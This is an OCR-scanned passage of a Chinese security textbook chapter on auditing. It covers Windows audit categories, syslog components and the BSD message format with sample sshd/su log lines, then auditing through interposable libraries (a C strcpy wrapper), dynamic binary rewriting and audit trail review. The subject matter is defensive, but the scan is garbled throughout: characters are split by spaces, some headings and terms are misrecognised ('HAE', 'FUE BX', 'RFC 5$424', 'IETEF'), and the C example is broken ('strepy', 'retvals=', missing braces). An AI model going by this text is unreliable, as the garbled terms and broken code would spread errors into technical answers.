的 读 取 访 问 和 更 改 。 实 例 : 对 象 打 开 ; 对 象 删除 。 

e RRS (policy change): 对 访问 策略 、 审 计 配 置 和 其 他 系统 级 设置 的 管理 进行 变更 。 
实例 : 用 户 权限 分 配 ; 新 的 可 信 域 增加 ; 审计 策略 更 改 。 

© 特权 使 用 (privilege use): Windows 合并 了 用 户 权 限 与 细 粒 度 地 执行 特定 任务 的 权限 的 
概念 。 如 果 你 启用 特权 使 用 审计 ， 你 将 记录 用 户 行使 其 访问 特定 的 系统 功能 (创建 对 
象 、 调 试 可 执行 代码 或 备份 系统 ) 的 所 有 实例 。 实 例 : 指定 的 权限 已 添加 到 用 户 的 访 
问 令 牌 (在 登录 中 ); 用 户 试 图 执行 特权 系统 服务 操作 。 

o 进程 跟踪 (process tracking): 当 进 程 启动 和 结束 ， 程 序 被 激活 或 对 象 被 间接 访问 时 生成 
的 详细 审计 信息 。 实 例 : 创建 新 的 进程 ; 进程 退出 ; 可 审计 数据 受到 保护 ; 可 审计 数 
据 不 受 保 护 ; 用 户 试图 安装 一 种 服务 。 
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e 系统 事件 (system event): 记录 影响 系统 的 完整 性 和 可 用 性 的 事件 信息 ， 包 括 启动 消息 
和 系统 关机 消息 。 实 例 : 系统 正在 启动 ; Windows 正在 关闭 ; 日 志 子 系统 资源 耗 尽 ; 
某 些 审计 丢失 ; 清除 审计 日 志 。 

Syslog 这 是 在 所 有 的 UNIX 系列 和 Linux 上 配置 的 UNIX 通用 日 志 机 制 。 它 包括 以 下 
组 件 : 

e Syslog() : 是 一 个 可 以 被 某 些 标准 系统 实用 工具 引用 的 应 用 程序 接口 (API)， 同 时 这 个 

接口 对 于 应 用 程序 也 是 可 用 的 。 

e logger: 是 一 个 用 于 将 单行 的 记录 添加 到 系统 日 志 中 的 UNIX 命令 。 

e /etc/ syslog.conf: 用 于 控制 记录 和 安排 系统 日 志 事 件 的 配置 文件 。 

e syslogd: 系统 守护 进程 ， 用 于 接收 和 管理 来 自 syslog() 调用 和 logger 命令 的 系统 日 志 

事件 。 

不 同 的 UNIX 实现 ， 其 系统 日 志 工 具 将 会 有 不 同 的 变化 ， 并 且 在 系统 中 没有 统一 的 系统 日 
志 格 式 。 我 们 将 在 第 25 章 研 究 Linux 系统 日 志 工 具 。 此 外 ,我们 提供 一 些 系统 日 志 相 关 功 能 
的 简要 概述 ， 并 分 析 系 统 日 志 协 议 。 

UNIX 系统 日 志 提 供 的 基本 服务 是 : 一 种 用 于 捕获 相关 事件 的 工具 ; 一 种 存储 设备 ; 

用 于 传输 从 其 他 计算 机 到 作为 系统 日 志 服 务 器 的 中 心计 算 机 系统 的 日 志 消 息 的 协议 。 除 ee 
基本 的 功能 ， 还 有 其 他 可 用 的 服务 ， 这 些 服务 通常 是 第 三 方 软件 包 ， 某 些 情形 下 是 系统 内 置 模 
块 。 区 ENT06] 列 出 了 以 下 最 为 常用 的 一 些 额外 功能 : 

o 强健 筛选 (robust filtering): 原始 系统 日 志 的 实现 仅 允 许 对 消息 基于 它们 的 实用 程序 和 
优先 级 进行 不 同 的 处 理 ; 允许 不 进行 细 粒 度 的 筛选 。 目 前 某 些 系统 日 志 的 实现 提供 更 
强健 的 筛选 功能 ， 如 根据 不 同 的 主机 或 不 同 的 消息 产生 程序 ， 或 者 根据 不 同 的 用 于 匹 
配 消息 内 容 的 正则 表达 式 ， 以 不 同 的 方式 处 理 消息 。 某 些 实现 还 允许 多 个 筛选 器 应 用 
于 一 个 消息 ， 提 供 更 复杂 的 筛选 功能 。 

日 志 分 析 (log analysis): 最 初 ， 系 统 日 志 服 务 器 没有 执行 任何 日 志 数 据 分 析 的 功能 ， 
它们 只 是 为 记录 和 传输 日 志 的 数据 提供 了 框架 。 管 理 员 可 以 使 用 单独 的 附加 程序 来 分 
析 系 统 日 志 数 据 。 现 在 某 些 系统 日 志 已 经 实现 了 有 限 的 内 置 日 志 分 析 功 能 ， 如 关联 多 
个 日 志 记录 的 能 力 。 

事件 响应 (event response): 某 些 系统 日 志 的 实现 在 检测 到 某 些 事件 时 可 以 启动 一 些 动作 。 
动作 实例 包括 发 送 SNMP 陷阱 、 通 过 页 面 或 电子 邮件 向 管理 员 发 出 报警 ， 以 及 启动 单独 
的 程序 或 脚本 。 也 可 以 创建 一 条 新 的 系统 日 志 消 息 ， 以 此 表明 检测 到 一 个 特定 的 事件 。 
FUE BX (alternative message format): 某 些 系统 日 志 的 实现 可 以 以 非 系统 日 志 的 
格式 接收 数据 ， 如 SNMP 陷阱 。 这 对 于 从 不 支持 系统 日 志 且 不 能 修改 的 主机 上 获取 安 
全 事件 数据 很 有 帮助 。 

日 志文 件 加 密 (log file encryption) : 某 些 系统 日 志 的 实现 可 以 配置 为 自动 旋转 加 密 日 志 
文件 来 保护 其 机 密 性 。 这 还 可 以 通过 使 用 操作 系统 或 第 三 方 加 密 程 序 完 成 。 

日 志 的 数据 库存 储 (database storage for log): 有 些 实现 可 以 将 日 志 记录 存储 在 传统 的 系 
统 日 志文 件 和 数据 库 中 。 数 据 库 格式 的 日 志 记录 对 进行 后 续 日 志 分 析 非 常 有 帮助 。 
速率 限制 (rate limiting): 有 些 实现 可 以 限制 系统 日 志 消 息 数量 或 者 在 特定 的 时 间 段 内 
从 特定 的 源 发 起 的 TCP 连接 数 。 这 对 于 保护 系统 日 志 服务 器 免 受 拒绝 服务 攻击 ， 避 免 
来 自 其 他 源 的 系统 日 志 消息 丢失 很 有用 。 因 为 这 项 技术 可 以 丢弃 来 自 蓄意 淹没 系统 日 
志 服 务 器 的 某 个 源 的 消息 ， 但 在 不 良 事件 发 生 期 间 由 于 生成 大 量 消息 也 能 导致 一 些 日 
志 数 据 丢失 。 
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系统 日 志 协议 提供 了 一 种 传输 方案 ， 以 便 计算 机 将 事件 通知 消息 通过 IP 网 络 发 送 到 事件 
信息 收集 器 一 也 称 为 系统 日 志 服务 器 。 在 系统 中 , 我 们 可 以 查看 捕获 和 记录 事件 的 过 程 : 各 
种 应 用 程序 和 系统 设备 将 消息 发 送 到 syslogd， 然 后 存储 在 系统 日 志 中 。 因 为 每 个 进程 、 应 用 
程序 和 UNIX 操作 系统 实现 ， 对 于 记录 的 事件 可 能 会 有 不 同 的 格式 设置 约定 ， 因 而 系统 日 志 协 
议 只 为 系统 之 间 传 输 提 供 通用 的 消息 格式 。 系 统 日 志 协 议 的 一 个 常见 版 本 最 初 是 在 加 州 大 学 伯 
克利 分 校 的 软件 发 行 版 (BSD) UNIX/TCP/ P 系统 上 开发 的 。 此 版 本 已 记录 在 RFC 3164 中 ， 
即 BSD 系统 日 志 协议 。 随 后 ，IETEF 发 布 了 RFC 5$424， 即 系统 日 志 协 议 (Syslog Protocol)， 该 
协议 被 确定 为 了 Internet 标准 ， 并 与 BSD 版 本 有 一 些 细节 上 的 差异 。 以 下 我 们 描述 的 是 BSD 
版 本 。 

BSD 系统 日 志 协议 的 消息 格式 由 下 面 三 部 分 组 成 : 

e PRI: 由 表示 消息 的 发 送 设备 和 消息 的 严重 程度 值 的 代码 组 成 ， 随 后 将 对 这 些 代码 进行 
描述 。 

est: 包含 时 间 惟 ， 以 及 主机 名 或 者 设备 的 IP 地 址 的 指示 信息 。 

e Msg: 由 两 个 域 组 成 ， 标 签 (TAG) 域 是 生成 消息 的 程序 或 进程 的 名 称 ， 内 容 
(CONTENT) 域 包含 消息 的 详细 信息 。Msg 部 分 传统 上 是 由 可 打印 字符 表示 的 任意 形 
式 的 消息 ， 它 给 出 了 事件 的 详细 信息 。 

图 18-6 显示 了 系统 日 志 消 息 的 几 个 实例 ， 其 中 没有 包括 PRI 部 分 。 


Mar 1 06:25:43 serverl sshd[23170]: Accepted publickey for server2 from 
172.30.128.115 port 21011 ssh2 


Mar 1 07:16:42 serverl sshd[9326]: Accepted password for murugiah from 
10.20.30.108 port 1070 ssh2 


Mar 1 07:16:53 serverl sshd[22938]: reverse ‘mapping checking getaddrinfo 
for ip10.165.nist.gov failed - POSSIBLE BREAKIN ATTEMPT! 


Mar 1 07:26:28 serverl sshd[22572]: Accepted publickey for server2 from 
172.30.128.115 port 30606 ssh2 


Mar 1 07:28:33 serverl su: BAD SU kkent to root on /dev/ttyp2 





Mar 1 07:28:41 serverl su: kkent to root on /dev/ttyp2 
图 18-6 系统 日 志 消 息 实 例 


发 送 给 系统 日 志 守 护 进程 (syslogd) 的 所 有 消息 ， 都 包含 一 个 消息 的 发 送 设备 和 消息 严重 
程度 值 ( 见 表 18-5 )。 发 送 设备 标识 了 生成 消息 的 应 用 程序 或 系统 组 件 。 严 重 程度 或 消息 级 别 ， 
指明 消息 的 相对 严重 级 别 并 可 用 于 某 些 尚 不 完善 的 筛选 。 


18.3.2 ”应 用 程序 级 日 志 功 能 


应 用 程序 ， 尤 其 是 具有 一 定 特权 级 别 的 应 用 程序 ， 存 在 的 安全 问题 可 能 不 能 被 系统 级 或 用 
户 级 审计 数据 捕获 。 应 用 程序 级 的 安全 漏洞 在 安全 邮件 列表 报告 的 漏洞 中 占 较 大 的 百分比 。 一 
种 类 型 的 可 被 利用 的 漏洞 是 对 输入 数据 缺乏 动态 检查 ， 这 将 可 能 造成 缓冲 区 溢出 的 发 生 〈 请 参 
阅 第 10 章 )。 其 他 漏洞 攻击 利用 了 应 用 程序 逻辑 中 的 错误 。 例 如 ， 特 权 应 用 程序 可 能 会 被 设计 
成 阅读 和 打印 特定 的 文件 。 该 应 用 程序 中 的 错误 ， 可 能 允许 攻击 者 利用 与 shell 环境 一 次 意外 
的 交互 ， 以 迫使 应 用 程序 可 以 读 取 和 打印 一 个 不 同 的 文件 ， 这 将 导致 安全 威胁 。 

系统 级 的 审计 达 不 到 能 够 捕获 应 用 程序 逻辑 错误 行为 的 细致 程度 。 而 且 ， 人 侵 检 测 系统 
查找 攻击 特征 或 者 没有 被 捕获 的 基于 应 用 程序 逻辑 错误 的 攻击 的 异常 行为 。 为 了 检测 和 审计 目 
的 ， 这 就 需要 捕获 应 用 程序 的 详细 的 行为 数据 ， 而 不 仅仅 是 对 系统 服务 和 文件 系统 的 访问 行 
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为 。 需 要 检测 到 的 应 用 程序 级 攻击 信息 ， 可 能 已 丢失 或 者 太 难 从 低级 别 信息 中 提取 ， 低 级 别 信 
息 包括 在 系统 调用 踪迹 和 操作 系统 中 所 产生 的 审计 迹 中 。 


表 18-5 UNIX 系统 日 志 程序 和 严重 级 别 
a) 系统 日 志 程 序 


加 | 和 | 


b) 系统 日 志 严重 级 别 


严重 级 别 说 明 
紧急 (emerg) 最 严重 的 消息 ， 如 立即 系统 关闭 
报警 (alert) 系统 情况 需要 立即 关注 
标准 (crit) 系统 紧急 情况 ， 如 硬件 或 软件 的 操作 失败 
错误 (err) 其 他 系统 错误 ; 可 恢复 
警告 (warming) 警告 消息 ; 可 恢复 
1 注意 (notice) 有 益 于 调查 的 异常 情况 ; 一 个 重要 事件 ， 通 常 是 正常 的 日 常 操作 的 一 部 分 
信息 (info) 信息 性 消息 
调试 (debug) 用 于 调试 目的 的 消息 


接着 ,我 们 讨论 从 应 用 程序 收集 审计 数据 的 两 种 方法 : 插入 库 ( interposable library) 和 动 
态 二 进 制 重 写 。 


18.3.3 HAE 


[KUPE99] 和 [KUPE04] 中 对 插入 库 技 术 进 行 了 描述 ， 该 技术 通过 创建 新 过 程 来 提供 应 用 
程序 级 的 审计 ， 这 些 新 过 程 通过 拦截 共享 库 函 数 的 调用 来 监视 应 用 程序 的 活动 。 插 和 人 位置 可 以 
在 不 需要 重新 编译 系统 库 和 应 用 程序 的 前 提 下 生成 审计 数据 。 因 此 ， 审 计数 据 的 生成 不 需要 改 
变 系统 共享 库 ， 也 不 需要 与 插入 点 相关 的 源 代码 。 这 种 方法 可 用 于 任何 UNIX 或 Linux 操作 系 
统 ， 以 及 某 些 其 他 操作 系统 。 

此 方法 利用 了 UNIX 中 动态 库 的 使 用 。 在 讨论 该 技术 之 前 ， 我 们 先 简短 介绍 一 下 共享 库 的 
背景 知识 。 

HEE 操作 系统 在 存档 库 中 包括 数 百 个 C 库 函 数 。 每 个 库 由 一 组 编译 和 链接 在 一 起 的 
变量 和 函数 组 成 。 链 接 函 数 将 所 有 内 存 引 用 解析 为 数据 和 函数 库 中 的 程序 代码 ， 生 成 逻辑 地 址 
或 相对 地 址 。 根 据 编 译 需求 ， 一 个 函数 可 以 被 链接 到 可 执行 程序 。 如 果 函 数 不 是 程序 代码 的 一 
部 分 ， 链 接 加 载 程序 搜索 库 的 列表 并 链接 所 需 对 象 到 目标 可 执行 文件 。 加 载 过程 中 ， 一 个 链 


BIS ARH 421 


接 库 函数 的 独立 副本 被 加 载 到 该 程序 的 虚拟 内 存 。 此 方案 被 称 为 静态 链接 库 (statically linked 
library). 

在 UNIX System V 版 本 3 中 ， 首 次 引入 了 一 种 更 加 灵活 的 方案 ， 它 使 用 的 是 静态 链接 共 
FÈ (statically linked shared library)。 和 使 用 静态 链接 库 一 样 ， 引 用 的 共享 对 象 在 链接 时 ， 由 
链接 加 载 程序 将 其 合并 到 目标 可 执行 程序 。 但 是 ， 静 态 链接 的 共享 库 中 的 每 个 对 象 都 被 分 配 一 
个 固定 的 虚拟 地 址 。 当 创建 可 执行 程序 时 ， 通 过 给 它们 分 配 的 虚拟 地 址 ， 链 接 加 载 程序 将 外 部 
引用 的 对 象 链接 到 函数 库 中 它 的 定义 。 因 此 ， 每 个 库 函 数 只 存在 一 个 副本 。 进 一 步 ， 可 以 修改 
该 函数 并 将 其 保留 在 它 的 固定 的 虚拟 地 址 中 。 只 有 对 象 需要 重新 编译 ， 而 引用 它 的 可 执行 程序 
无 须 重新 编译 。 但 是 ， 修 改 通 常 是 较 小 的 ， 修 改 必须 以 这 种 方式 进行 : 代码 中 的 起 始 地 址 和 任 
何 变量 、 常 量 或 程序 标签 的 地 址 不 能 改变 。 

UNIX System V 版 本 4 引信 了 动态 链接 共享 库 ( dynamically-linked shared library) 的 概念 。 
使 用 动态 链接 库 ， 链 接 到 共享 库 例 程 会 推迟 到 函数 的 加 载 时 。 此 时 ， 所 需 函 数 库 内 容 被 映射 到 
进程 的 虚拟 地 址 空间 。 因 此 ， 如 果 在 加 载 之 前 对 函数 库 进行 了 更 改 ， 引 用 函数 库 的 任何 程序 是 
不 受 影响 的 。 

对 于 静态 和 动态 链接 共享 库 ， 共 享 页 中 的 内 存 页 必须 标记 为 只 读 。 如 果 某 个 程序 需要 在 共 
享 页 上 执行 内 存 更 新 ， 系 统 应 使 用 写 时 复制 ( copy-on-write) 方案 ， 系 统 给 该 进程 分 配 内 存 页 
的 副本 ， 这 个 副本 可 以 被 修改 而 不 会 影响 使 用 该 内 存 页 的 其 他 用 户 。 

插入 库 的 使 用 图 18-7a 指出 了 程序 调用 动态 链接 共享 库 中 的 一 个 例 程 时 操作 的 正常 模 
式 。 在 加 载 时 ， 程 序 中 例 程 foo 的 引用 被 解析 为 共享 库 中 的 foo 的 开始 虚拟 内 存 的 地 址 。 

使 用 函数 库 插入 的 方法 来 构造 特殊 的 插入 库 ， 以 便 在 加 载 时 程序 链接 到 插入 库 ， 而 不 是 共 
享 库 。 对 于 审计 调用 的 共享 库 中 的 每 个 函数 ， 插 和 人 库 包 含 具有 相同 名 称 的 函数 。 如 果 插 入 库 中 
不 包含 所 需 函 数 ， 加 载 程序 继续 在 共享 库 
搜索 并 直接 与 目标 函数 链接 。 共享 库 

插入 模块 可 以 执行 任何 与 审计 相关 的 
功能 ， 比 如 记录 调用 的 发 生 、 传 人 和 返回 
的 参数 以 及 调用 程序 的 返回 地 址 等 。 通 
常 ， 择 和 人 模块 将 调用 实际 的 共享 函数 ( 见 
图 18-7b)， 以 保证 应 用 程序 的 行为 仅 被 监 
控 ， 而 不 被 改变 。 

这 种 技术 允许 拦截 某 些 函 数 调用 和 存 
储 状 态 ， 并 且 在 这 些 调 用 之 间 无 须 重新 编 
译 调 用 程序 或 共享 对 象 。 

[KUPE99] 提供 了 一 个 用 C 编写 的 插 人 
库 函数 ( 见 图 18-8 ) 的 一 个 实例 。 此 函数 的 
描述 如 下 : 

1. AUDIT_CALL_START (第 8 行 ) 位 
于 每 个 可 插入 函数 的 开头 。 这 使 得 将 任意 
初始 化 代码 插入 到 每 个 函数 很 容易 。 

2. AUDIT LOOKUP COMMAND 
(图 18-8a 第 10 行 ， 详 情 在 图 18-8b 中 ) 使 
用 dlsym (3x) 命令 在 共享 库 中 查找 指向 b) 可 插入 的 库 调 用 
下 一 个 函数 定义 的 指针 。 特 殊 标志 RTLD_ 图 18-7 插入 库 的 使 用 
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NEXT (图 18-8b 第 247) 表示 ， 由 运行 时 加 载 程序 使 用 的 库 搜索 路 径 的 下 一 个 引用 将 返回 。 
如 果 引 用 被 找到 或 向 调用 程序 返回 错误 值 ， 函 数 指针 将 被 存储 在 fptr。 
3. 第 12 行 包含 该 函数 调用 之 前 执行 的 命令 。 
4. 在 这 种 情况 下 ， 插 入 的 函数 执行 原来 的 函数 调用 并 将 值 返回 给 用 户 〈 第 14 行 )。 其 他 可 
能 的 操作 包括 : 参数 的 检查 、 记 录 或 转换 ;， 库 调用 实际 执行 的 预防 ; 以 及 返回 值 的 检查 、 记 录 
或 转换 。 
597 5. 在 结果 返回 前 ， 附 加 代码 可 能 被 插入 (第 16 行 ), 但 是 本 例 中 没有 插入 。 


1 / WERE EHH EEE EKER ERE ERA 
* Logging the use of certain functions * 


char *strcpy (char *dst, const char *src) { 
char *(*fptr) (char *,const char *); /* pointer to the real function */ 
char *retval; /* the return value of the call */ 
AUDIT_CALL_START; 
AUDIT_LOOKUP_COMMAND (char *(*) (char *,const char *),“strepy”,fptr,NULL) ; 
AUDIT_USAGE_WARNING (“strcpy”); 


retvals=((*fptr) (dst,src)); 


return (retval); 





a) 函数 定义 〈 全 部 大 写 项 表示 其 他 位 置 定义 的 宏 ) 


#define AUDIT_LOOKUP_COMMAND (t,n,p,e) 
p=(t)dlsym(RTLD_NEXT,n) ; 
if (p==NULL) { 


perror (“looking up command”) ; 
syslog(LOG_INFO, “could not find $s in library: %m",n); 
return (e); 





b) 用 在 函数 中 的 宏 
图 18-8 在 插入 库 中 的 函数 实例 


18.3.4 动态 二 进 制 重 写 


插入 技术 旨 在 使 用 动态 链接 的 共享 库 。 它 不 能 拦截 静态 链接 程序 的 函数 调用 ， 除 非 系统 中 
的 所 有 程序 在 审计 库 引 入 时 都 重新 链接 。[ZHOU04] 介绍 了 一 种 方法 ， 此 方法 称 为 动态 二 进 制 
重 写 ， 可 用 于 静态 和 动态 链接 的 程序 。 

动态 二 进 制 重 写 是 一 种 直接 更 改 可 执行 的 二 进 制 代码 的 后 编译 技术 。 更 改 在 加 载 时 进行 并 
且 仅 修改 程序 的 内 存 镜像 ， 而 不 是 辅助 存储 上 的 二 进 制 程序 文件 。 与 插入 技术 一 样 ， 动 态 二 进 
制 重 写 不 需要 重新 编译 应 用 程序 二 进 制 文件 。 审 计 模 块 选择 一 直 被 推迟 到 应 用 程序 被 调用 ， 以 
便 进行 审计 配置 的 灵活 选择 。 

这 个 技术 在 Linux 上 利用 两 个 模块 实现 : 一 个 是 可 加 载 核心 模块 ， 另 一 个 是 监控 守护 进程 。 
Linux 是 由 一 系列 模块 构成 的 ， 大 量 的 模块 可 以 根据 需要 自动 加 载 和 印 载 。 这 些 相对 独立 的 块 

[598] (block) 被 称 为 可 加 载 模块 (loadable module) [GOYE99]。 从 本 质 上 讲 ， 模 块 是 一 个 对 象 文件 ， 
其 代码 可 以 在 运行 时 链接 到 内 核 和 从 内 核 断 开 链接 。 通 常 ， 模 块 实现 某 些 特定 功能 ， 比 如 一 个 
文件 系统 、 设 备 驱 动 程序 ， 或 某 些 内 核 上 层 的 其 他 功能 。 模 块 不 作为 自己 的 进程 或 线程 执行 ， 
虽然 它 可 以 根据 需要 创建 用 于 各 种 用 途 的 内 核 线程 。 更 确切 地 讲 ， 模 块 是 代表 当前 进程 在 内 核 
模式 下 执行 的 。 


1I ARH 423 


图 18-9 显示 了 这 种 方法 的 结构 。 内 核 模 块 可 通过 截获 execve( ) 系统 调用 确保 能 够 为 所 有 
可 执行 文件 安装 审计 。execve( ) 函数 的 作用 就 是 ， 当 有 一 个 新 的 可 执行 文件 需要 运行 时 ， 将 其 
加 载 到 一 个 新 的 进程 地 址 空间 并 开始 执行 它 。 通 过 截获 此 系统 调用 ， 内 核 模块 就 可 以 使 应 用 
程序 在 执行 其 第 一 条 指令 之 前 将 应 用 程序 rr 
的 执行 停止 ， 并 在 执行 开始 之 前 插入 审计 
例 程 。 

应 用 程序 的 审计 安装 实际 是 由 监控 守 
护 进 程 执行 的 ， 它 是 一 个 特权 用 户 空间 进 
程 。 守 护 进 程 管理 两 个 库 : 补丁 程序 库 和 审 
计 函 数 库 。 补 丁 程序 库 包含 为 应 用 程序 安 
装 审计 的 代码 。 审 计 函 数 库 包 含 用 来 插入 
到 应 用 程序 的 审计 代码 。 审 计 和 补丁 程序 
库 中 的 代码 具有 动态 库 的 形式 。 通 过 使 用 
动态 库 ， 在 守护 进程 运行 时 可 以 更 新 库 中 
的 代码 。 此 外 ， 在 同一 时 间 可 以 存在 多 个 操作 系统 内 核 
版 本 的 库 。 

事件 序列 如 下 所 示 : 图 18-9 应 用 程序 审计 运行 时 的 环境 

1. 受 监控 的 应 用 程序 是 由 execve( ) 系统 调用 调用 的 。 

2. 内 核 模块 截获 该 系统 调用 并 停止 应 用 程序 ， 并 为 守护 进程 设置 该 进程 的 父 进 程 。 然 后 内 
核 模块 通知 用 户 空间 守护 程序 ， 受 监控 的 应 用 程序 已 启动 。 

3. 监控 守护 进程 找到 补丁 程序 和 适用 于 此 应 用 程序 的 审计 库 函 数 。 守 护 进 程 将 审计 库 函 数 
加 载 到 应 用 程序 的 地 址 空间 ， 并 且 在 应 用 程序 的 代码 中 某 些 点 插入 审计 函数 调用 。 

4. 在 应 用 程序 已 完成 审计 安装 后 ， 守 护 进程 使 应 用 程序 开始 执行 。 

一 种 特殊 的 语言 被 开发 用 于 简化 创建 审计 和 补丁 程序 代码 的 过 程 。 从 本 质 上 讲 ， 补 丁 程序 
可 以 在 函数 调用 的 任何 点 被 插入 到 一 个 共享 库 例 程 。 此 补丁 程序 可 以 调用 审计 例 程 ， 也 可 以 调 
用 共享 库 例 程 ， 人 逻辑 上 类 似 于 前 面 所 述 的 插入 技术 。 


18.4 审计 迹 分 析 


由 于 系统 配置 、 关 注 的 领域 、 可 用 的 软件 、 企 业 的 安全 策略 ， 以 及 合法 用 户 与 人 侵 者 的 行 
为 模式 等 各 有 不 同 ， 所 以 用 于 审计 迹 分 析 的 程序 和 过 程 非常 之 多 。 本 节 介 绍 了 一 些 我 们 所 了 解 
的 关于 审计 迹 分 析 的 情况 。 


18.4.1 准备 


为 了 进行 有 用 的 审计 分 析 ， 分 析 员 或 安全 管理 员 需 要 了 解 可 用 信息 以 及 如 何 使 用 它 。 
NIST SP 800-92 [KENT06] 在 这 方面 提供 了 一 些 有 用 的 建议 ， 本 小 节 对 此 做 了 一 个 汇总 。 

了 解 日 志 记 录 安全 管理 员 (或 其 他 复核 和 分 析 日 志 的 个 人 ) 需要 了 解 日 志 记录 的 上 下 
文 。 相 关 的 信息 可 能 存放 在 同一 日 志 的 其 他 记录 中 ， 或 存放 在 其 他 日 志 的 记录 中 ， 也 可 能 存放 
在 非 日 志 源 (如 配置 管理 记录 ) 中 。 管 理 员 应 该 清楚 不 可 靠 记 录 的 存在 ， 如 从 已 知 的 安全 软件 
包 查 找 恶意 活动 时 会 产生 大 量 的 误 报 。 

大 多 数 审计 文件 格式 混杂 着 多 种 明文 语言 和 加 密 的 消息 或 代码 。 这 些 消息 和 代码 对 软件 供 
应 商 有 意义 但 对 管理 员 来 说 却 不 是 必需 的 。 管 理 员 必须 努力 解密 ， 尽 可 能 多 地 获取 日 志 记录 中 
包含 的 信息 。 在 某 些 情况 下 ， 记 录 分 析 软 件 执行 数据 精简 任务 ， 以 减少 管理 员 的 负担 。 尽 管 如 
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此 ， 管 理 员 应 该 对 输入 到 分 析 和 复核 软件 的 原始 数据 有 一 定 的 了 解 ， 以 便 能 够 评估 这 些 程序 包 
的 实用 价值 。 

能 够 清楚 地 了 解 日 志 数 据 的 最 有 效 的 方法 是 定期 (例如 ， 每 天 ) 查看 并 分 析 它 的 一 部 分 
数据 。 目 标 是 最 终了 解 典 型 的 日 志 记 录 的 基线 ， 其 上 可 能 包含 了 系统 上 的 日 志 记录 的 大 部 分 
内 容 。 

TREFI ”要 进行 有 效 的 检查 和 分 析 ， 管理 员 应 该 从 培训 或 实际 经 验 中 获得 对 以 下 内 容 
的 清楚 了 解 : 

o 机 构 策 略 规定 的 可 接受 的 使 用 ， 以 便 管 理 员 能 够 识别 对 策略 的 违背 情况 。 

© 他 们 的 主机 使 用 的 安全 软件 ， 包 括 每 个 程序 可 以 检测 的 与 安全 相关 的 事件 类 型 和 每 个 

程序 通常 的 检测 配置 文件 (例如 ， 已 知 的 误 报 )。 

© 他 们 的 主机 使 用 的 操作 系统 和 主要 的 应 用 程序 (例如 ， 电 子 邮 件 、Web)， 尤 其 是 每 个 

操作 系统 和 主要 应 用 程序 的 安全 性 以 及 日 志 能 力 和 特征 。 

© 常见 攻击 技术 的 特征 ， 尤 其 是 这 些 技术 的 使 用 是 如 何 被 记录 在 每 个 系统 上 的 。 

e 用 于 分 析 的 软件 包括 : 日 志 查看 器 、 记 录 精 简 脚 本 和 数据 库 查 询 工 具 。 


18.4.2 ”定时 


审计 迹 可 以 以 多 种 方式 使 用 。 分 析 的 类 型 取决 于 或 至 少 部 分 取决 于 进行 分 析 的 时 间 。 可 能 
的 情况 包括 : 

。 事件 发 生 后 的 审计 迹 复核 : 这 种 类 型 的 复核 由 一 个 观察 到 的 事件 触发 ， 例 如 ， 可 以 是 
一 个 已 知 的 系统 或 应 用 程序 软件 问题 ， 也 可 以 是 用 户 引 起 的 违背 现 有 安全 策略 的 事件 
或 者 某 些 无 法 解释 的 系统 或 用 户 问题 。 复 核能 够 收集 信息 以 详细 了 解 该 事件 已 知 的 情 
况 ， 从 而 诊断 原因 或 发 现 问 题 ， 并 提出 补救 措施 和 对 策 。 这 种 类 型 的 复核 重点 是 那些 
与 特定 事件 相关 的 审计 迹 记 录 。 

。 审计 迹 数据 的 定期 检查 : 此 类 型 的 复核 是 检查 所 有 审计 迹 数据 或 者 已 定义 的 审计 迹 数 
据 子 集 ， 并 且 有 许多 可 能 的 目标 。 目 标的 实例 包括 : 查找 能 够 显示 安全 问题 的 事件 或 
模式 ， 开 发 正常 的 行为 配置 文件 ， 搜 索 异常 行为 ， 以 及 开发 个 人 用 户 的 配置 文件 来 维 
护 用 户 的 永久 记录 等 。 

e 实时 审计 分 析 : 也 可 以 以 实时 或 接近 实时 的 方式 使 用 审计 分 析 工具 。 实 时 分 析 是 人 侵 
检测 功能 的 一 部 分 。 


18.4.3 ”审计 复核 


审计 复核 与 使 用 数据 精简 和 分 析 工 具 的 审计 迹 数据 分 析 不 同 的 是 审计 复核 的 概念 。 审 计 复 
核 功能 使 管理 员 能 够 从 选 定 的 审计 迹 中 读 取 信息 。 通 用 标准 规范 [CCPS12a] 要 求 的 一 项 功能 是 
允许 预先 存储 或 事后 存储 审计 所 选 内容 ， 并 且 包 括 能 够 有 选择 地 查看 以 下 内 容 的 能 力 : 

e 一 个 或 多 个 用 户 的 动作 〈 例 如 ， 识 别 、 身 份 验证 、 系 统 输入 和 访问 控制 动作 )。 

e 对 一 个 特定 的 对 象 或 系统 资源 执行 的 动作 。 

e 所 有 或 一 组 指定 的 审计 异常 。 

e 与 一 个 特定 的 系统 或 安全 属性 相关 的 动作 。 

审计 复核 可 以 重点 关注 匹配 特定 属性 的 记录 ， 如 用 户 或 用 户 组 、 时 间 窗 口 和 记录 类 型 等 。 

可 用 于 审计 复核 自动 化 的 工具 是 基于 管理 员 输 入 的 审计 记录 的 优先 级 划分 工具 。 记 录 可 以 
根据 因素 的 组 合 确定 优先 级 。 实 例 包 括 以 下 内 容 : 

© 记录 类 型 (例如 ， 消 息 代码 103、 消 息 类 CRITICAL), 
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© 记录 类 型 是 否 为 新 的 (即日 志 中 此 类 型 的 记录 以 前 出 现 过 吗 ? )。 


e 日 志 源 。 

e 源 或 目标 IP 地 址 (例如 ， 在 黑 名 单 上 的 源 地 址 、 关 键 系统 的 目标 地 址 、 涉 及 特定 IP 地 
址 的 以 前 事件 )。 

e 一 天 内 或 一 周 内 的 时 间 (例如 ， 一 条 记录 可 能 在 特定 时 间 被 接受 ,但 不 允许 在 其 他 时 
间 被 接受 )。 


记录 的 频率 (例如 ， 在 y 秒 内 发 生 x 次 )。 

这 种 类 型 的 审计 复核 可 能 的 目的 有 很 多 。 审 计 复核 可 以 使 管理 员 ， 对 系统 当前 操作 及 系 
统 上 用 户 和 应 用 程序 配置 文件 、 攻 击 活动 的 级 别 和 其 他 与 安全 和 使 用 情况 相关 的 事件 ， 产 生 一 
种 直观 的 感受 。 审 计 复 核 可 以 帮助 理解 ， 攻 击 事件 发 生 后 系统 对 它 的 响应 从 而 导致 软件 和 程序 
更 改 。 


18.4.4 ”数据 分 析 方 法 


用 于 审计 数据 分 析 的 方法 和 算法 的 种 类 很 多 ， 这 里 也 不 便 进 行 详细 的 介绍 。 基 于 在 
[SING04] 中 的 讨论 ， 我 们 对 一 些 主要 的 方法 作 以 简单 的 介绍 。 

基本 的 报警 ”分析 的 最 简单 的 形式 是 软件 对 已 发 生 的 特别 突出 的 事件 给 出 提示 。 如 果 提 示 
是 实时 给 出 的 ， 则 它 可 以 充当 人 侵 检测 系统 的 一 部 分 。 对 于 那些 可 能 不 会 引起 人 侵 报警 的 可 疑 
事件 ， 那 么 要 求 事 后 进一步 进行 分 析 。 

